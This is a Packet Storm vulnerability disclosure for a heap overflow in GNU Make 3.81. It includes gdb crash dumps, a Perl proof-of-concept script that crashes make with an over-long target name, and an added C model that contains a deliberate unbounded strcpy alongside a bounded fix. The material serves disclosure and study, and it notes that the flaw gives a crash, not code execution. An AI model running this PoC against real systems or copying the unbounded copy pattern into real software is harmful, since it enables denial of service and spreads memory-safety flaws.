Make 3.81 Heap Overflow

Date: 25 Jul 2014 00:00:00
Reported by: HyP
Type: packetstorm
Source: packetstormsecurity.com

Make 3.81 Heap Overflow PoC for Linux x86 and x86-64: an over-long target name passed on the command line ends up in a pointer that make dereferences while walking a linked list, so make dies with SIGSEGV on an attacker-chosen address (0xdeadbeef in the sessions below).

Code
`=pod
# Exploit Title: MAKE Heap Overflow - Pointer dereferencing POC (Calloc)-X86 X64  
# Date: [14.07.14]  
# Exploit Author: HyP  
# Vendor Homepage: http://www.gnu.org/software/make/  
# Software Link: http://ftp.gnu.org/gnu/make/  
# Version: Make 3.81  
# Tested on: linux32,64 bits (Fedora,Debian,ubuntu,Arch)  
# CVE : none  
  
*******************************************************************************************  
Special Thanks:  
  
kmkz  
Zadyree  
Sec0d Team  
  
*******************************************************************************************  
*******************************************************************************************  
32bits  
  
  
./checksec.sh --file make  
RELRO      STACK CANARY     NX          PIE     RPATH     RUNPATH     FILE  
No RELRO   No canary found  NX enabled  No PIE  No RPATH  No RUNPATH  make  
  
  
gdb-peda$ r `perl -e 'print "A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4'`  
  
  
Program received signal SIGSEGV, Segmentation fault.  
[----------------------------------registers-----------------------------------]  
...  
EAX: 0xdeadbeef  
EBX: 0x807b971 --> 0x6f2e ('.o')  
ECX: 0x0  
EDX: 0x1  
ESI: 0xdeadbeef  
EDI: 0x0  
EBP: 0xbfffc5e8 --> 0xbfffc698 --> 0x8081de0 --> 0x0  
ESP: 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')  
EIP: 0x80548b2 (mov eax,DWORD PTR [eax])  
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)  
[-------------------------------------code-------------------------------------]  
0x80548aa: je 0x80548b8  
0x80548ac: lea esi,[esi+eiz*1+0x0]  
0x80548b0: mov esi,eax  
=> 0x80548b2: mov eax,DWORD PTR [eax] <------ Pointer Dereferencing  
0x80548b4: test eax,eax  
0x80548b6: jne 0x80548b0  
0x80548b8: cmp DWORD PTR [ebp-0x1034],0x1  
0x80548bf: mov DWORD PTR [ebp-0x10ac],edx  
[------------------------------------stack-------------------------------------]  
0000| 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')  
0004| 0xbfffa314 --> 0x807b971 --> 0x6f2e ('.o')  
0008| 0xbfffa318 --> 0x2  
0012| 0xbfffa31c --> 0xb7ffadf8 ("symbol=%s; lookup in file=%s [%lu]\n")  
0016| 0xbfffa320 --> 0x0  
0020| 0xbfffa324 --> 0x0  
0024| 0xbfffa328 --> 0x0  
0028| 0xbfffa32c --> 0x0  
[------------------------------------------------------------------------------]  
Legend: code, data, rodata, value  
Stopped reason: SIGSEGV  
0x080548b2 in ?? ()  
  
  
Overflow code (objdump of the stripped binary; `<calloc@plt+0xac38>` is only the nearest preceding symbol plus an offset, it does not mean this code lives inside calloc):  
...  
80548aa: 74 0c je 80548b8 <calloc@plt+0xac38>  
80548ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi  
80548b0: 89 c6 mov %eax,%esi  
80548b2: 8b 00 mov (%eax),%eax  
80548b4: 85 c0 test %eax,%eax  
80548b6: 75 f8 jne 80548b0 <calloc@plt+0xac30>  
...  
  
  
gdb-peda$ x/x $eax  
0x807ff68: 0x00000000  
(This read must come from a different stop than the fault above: at the SIGSEGV, EAX is 0xdeadbeef, which is unmapped, so x/x could not read it there.)  
  
gdb-peda$ vmmap  
Start      End        Perm  Name  
0x08048000 0x0806f000 r-xp  /root/Desktop/RESEARCH/make_BoF/make  
0x0806f000 0x08070000 rw-p  /root/Desktop/RESEARCH/make_BoF/make  
  
0x08070000 0x08092000 rw-p  [heap] // heap overflow !!  
  
Note: vmmap only shows that a [heap] mapping exists; 0xdeadbeef lies in none of the listed ranges, which is why the load faults. What the session does demonstrate is that bytes from the over-long target name (4000 + 96 bytes of filler, then 0xdeadbeef) land in the pointer that the list walk at 0x80548b2 loads through, i.e. a controlled pointer read. With NX enabled and no write through the pointer in this loop, that is a crash, not code execution.  
  
  
  
*******************************************************************************************  
*******************************************************************************************  
64bits  
  
  
Overflow code (objdump; `<__ctype_b_loc@plt+0xa52b>` is again just the nearest symbol plus an offset):  
40cc59: 74 10            je 40cc6b <__ctype_b_loc@plt+0xa52b>  
40cc5b: 0f 1f 44 00 00   nop DWORD PTR [rax+rax*1+0x0]  
40cc60: 48 89 c3         mov rbx,rax  
40cc63: 48 8b 00         mov rax,QWORD PTR [rax]   // pointer dereferencing; RAX holds the 8 controlled bytes (0xdeadbeefdeadbeef below), which the "\xef\xbe\xad\xde" x 4 tail of the gdb argument supplies  
  
  
Program received signal SIGSEGV, Segmentation fault.  
[----------------------------------registers-----------------------------------]  
RAX: 0xdeadbeefdeadbeef  
RBX: 0xdeadbeefdeadbeef  
RCX: 0x4242424242424242 ('BBBBBBBB')  
RDX: 0x0  
RSI: 0x7fffffff97d0 ('A' <repeats 200 times>...)  
RDI: 0x7fffffffa7e2 --> 0x732e656c69666500 ('')  
RBP: 0x7fffffffb930 --> 0x1  
RSP: 0x7fffffff95f0 --> 0x0  
RIP: 0x40cc63 (mov rax,QWORD PTR [rax])  
R8 : 0x4242424242424242 ('BBBBBBBB')  
R9 : 0x7ffff7972440 (mov dx,WORD PTR [rsi-0x2])  
R10: 0x4242424242424242 ('BBBBBBBB')  
R11: 0x7ffff799f990 --> 0xfffd28d0fffd2708  
R12: 0x1  
R13: 0x0  
R14: 0x6397a0 --> 0x6f2e25 ('%.o')  
R15: 0x0  
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)  
[-------------------------------------code-------------------------------------]  
0x40cc59: je 0x40cc6b  
0x40cc5b: nop DWORD PTR [rax+rax*1+0x0]  
0x40cc60: mov rbx,rax  
=> 0x40cc63: mov rax,QWORD PTR [rax] <----- Pointer dereferencing  
0x40cc66: test rax,rax  
0x40cc69: jne 0x40cc60  
0x40cc6b: cmp DWORD PTR [rbp-0x105c],0x1  
0x40cc72: lea rdi,[rbp-0x40]  
[------------------------------------stack-------------------------------------]  
0000| 0x7fffffff95f0 --> 0x0  
0008| 0x7fffffff95f8 --> 0x0  
0016| 0x7fffffff9600 --> 0x0  
0024| 0x7fffffff9608 --> 0x645e50 --> 0x646630 --> 0x64667b --> 0x5f7266006362696c ('libc')  
0032| 0x7fffffff9610 --> 0xffffffdf  
0040| 0x7fffffff9618 --> 0x645e58 --> 0x6462f0 --> 0x64a500 --> 0x64a541 --> 0x5f726600656b616d ('make')  
0048| 0x7fffffff9620 --> 0x7ffff7bd01f8 --> 0x645e50 --> 0x646630 --> 0x64667b --> 0x5f7266006362696c ('libc')  
0056| 0x7fffffff9628 --> 0x0  
[------------------------------------------------------------------------------]  
Legend: code, data, rodata, value  
Stopped reason: SIGSEGV  
0x000000000040cc63 in ?? ()  
  
  
  
*******************************************************************************************  
*******************************************************************************************  
Proof of Concept - Source code  
*******************************************************************************************  
*******************************************************************************************  
=cut  
  
#!/usr/bin/perl  
  
use 5.010;  
use strict;  
use warnings;  
use Time::HiRes qw(sleep);      # the builtin sleep() truncates 0.5 to 0  
  
say "Please set the core file size limit before running (ulimit -c 1000; ulimit -c unlimited avoids a truncated core)";  
sleep 0.5;  
  
# Same argument as the gdb session above: 4096 filler bytes, then 0xdeadbeef  
# repeated so that a 4-byte (x86) or 8-byte (x86-64) pointer is fully controlled.  
my $buff = "A" x 4000 . "B" x 96;  
my $addr = "\xef\xbe\xad\xde" x 4;  
my $make = "./make";  
my $gdb  = "gdb --core core";  
my $PAYLOAD = $buff . $addr;    # built in-process; no second perl needed  
  
# List-form system() hands the raw bytes to make as one argv element,  
# without a shell re-parsing them.  
system($make, $PAYLOAD) == -1 and die "cannot run $make: $!";  
my $sig = $? & 127;  
say $sig ? "make died with signal $sig (11 = SIGSEGV)" : "make exited with status " . ($? >> 8);  
  
say " Reading core file with GDB: $gdb ";  
sleep 0.5;  
  
`
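The crash pattern the two gdb sessions show (a fixed 4096-byte name buffer, a pointer stored after it, a `for (p = head; p; p = p->next)` walk compiled to `mov eax,[eax] / test eax,eax / jne`) is modelled below as an added C example. It is constructed for this page and is not GNU make's source: the buffer size `NAME_BUF`, the `struct frame` layout, the three-node list and every function name (`vulnerable_walk`, `hardened_walk`, `build_payload`, `predicted_pointer`, `poc_pointer`, `walk_goal`) are assumptions drawn from the dumps. `predicted_pointer` reproduces, without running anything, why EAX reads 0xdeadbeef on x86 and RAX reads 0xdeadbeefdeadbeef on x86-64 for the same `"A" x 4000 . "B" x 96 . "\xef\xbe\xad\xde" x 4` argument, and also handles the edge case of an argument of exactly 4096 bytes, where only the copied NUL reaches the pointer. `hardened_walk` is the missing length check.

```c
/* Added example modelling the crash pattern in the gdb sessions above; it is not
 * GNU make's code.  Every size, layout and name here is an assumption. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF 4096                 /* assumed size of the overflowed buffer */

struct node { struct node *next; int id; };
struct frame { char name[NAME_BUF]; struct node *head; };   /* assumed layout */

/* Vulnerable pattern: unbounded copy, then the list walk.  An over-long goal
 * replaces f.head with the bytes after the filler (0xdeadbeef) and the first
 * p->next load faults.  Only call this with a trusted, short name. */
static int vulnerable_walk(struct node *head, const char *goal)
{
    struct frame f; int count = 0;
    f.head = head;
    strcpy(f.name, goal);             /* no length check: the bug */
    for (struct node *p = f.head; p; p = p->next)
        count++;
    return count;
}

/* Hardened form: refuse any name that does not fit together with its NUL. */
static int hardened_walk(struct node *head, const char *goal)
{
    struct frame f; int count = 0;
    const char *nul = memchr(goal, '\0', NAME_BUF);
    if (nul == NULL)                  /* 4096 bytes or more: would overflow */
        return -1;
    f.head = head;
    memcpy(f.name, goal, (size_t)(nul - goal) + 1);
    for (struct node *p = f.head; p; p = p->next)
        count++;
    return count;
}

/* The gdb session's argument: "A" x 4000 . "B" x 96 . "\xef\xbe\xad\xde" x 4.
 * Returns its length (4112), or 0 if cap is too small for it plus a NUL. */
static size_t build_payload(uint8_t *out, size_t cap)
{
    static const uint8_t addr[4] = { 0xef, 0xbe, 0xad, 0xde };
    size_t len = NAME_BUF + 4 * sizeof addr;
    if (cap < len + 1)
        return 0;
    memset(out, 'A', 4000);
    memset(out + 4000, 'B', 96);
    for (size_t i = 0; i < 4; i++)
        memcpy(out + NAME_BUF + i * sizeof addr, addr, sizeof addr);
    out[len] = '\0';
    return len;
}

/* Predicts f.head after strcpy() of arg for a ptr_size-byte little-endian
 * pointer (4 on x86, 8 on x86-64).  Pointer bytes the copy does not reach keep
 * their original value; the copied NUL is modelled, so an argument of exactly
 * 4096 bytes zeroes only the pointer's low byte. */
static uint64_t predicted_pointer(const uint8_t *arg, size_t len,
                                  uint64_t original, size_t ptr_size)
{
    uint64_t value = 0;
    for (size_t i = 0; i < ptr_size; i++) {
        size_t k = NAME_BUF + i;      /* offset of this pointer byte in the copy */
        uint8_t byte = (uint8_t)(original >> (8 * i));
        if (k < len)       byte = arg[k];   /* overwritten by the argument */
        else if (k == len) byte = 0;        /* overwritten by strcpy's NUL */
        value |= (uint64_t)byte << (8 * i);
    }
    return value;
}

/* What the PoC argument turns the pointer into, for either pointer size. */
static uint64_t poc_pointer(size_t ptr_size, uint64_t original)
{
    uint8_t payload[NAME_BUF + 64];
    size_t len = build_payload(payload, sizeof payload);
    return predicted_pointer(payload, len, original, ptr_size);
}

/* Walks a three-node list with one routine (hardened == 0 picks the vulnerable
 * one, so only give it a short goal).  goal == NULL means the PoC argument,
 * which only the hardened routine is allowed to see. */
static int walk_goal(int hardened, const char *goal)
{
    struct node c = { NULL, 3 }, b = { &c, 2 }, a = { &b, 1 };
    uint8_t payload[NAME_BUF + 64];
    if (goal == NULL) {
        if (!hardened)
            return -2;                /* refuse to reproduce the crash */
        build_payload(payload, sizeof payload);
        goal = (const char *)payload;
    }
    return hardened ? hardened_walk(&a, goal) : vulnerable_walk(&a, goal);
}

int main(void)
{
    printf("x86 pointer after overflow:    0x%08llx\n",     /* EAX in the 32-bit dump */
           (unsigned long long)poc_pointer(4, 0x0807b971ULL));
    printf("x86-64 pointer after overflow: 0x%016llx\n",   /* RAX in the 64-bit dump */
           (unsigned long long)poc_pointer(8, 0x6397a0ULL));
    printf("hardened_walk(poc) = %d, hardened_walk(\"all\") = %d\n",
           walk_goal(1, NULL), walk_goal(1, "all"));
    return 0;
}
```

Build with `cc -o model model.c` and run it. The vulnerable routine is deliberately never given the PoC argument, since that would just reproduce the SIGSEGV; the value of the model is that `predicted_pointer` explains the register contents in both dumps from the argument layout alone, and `hardened_walk` shows the bound that turns the overflow into a rejected goal name.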
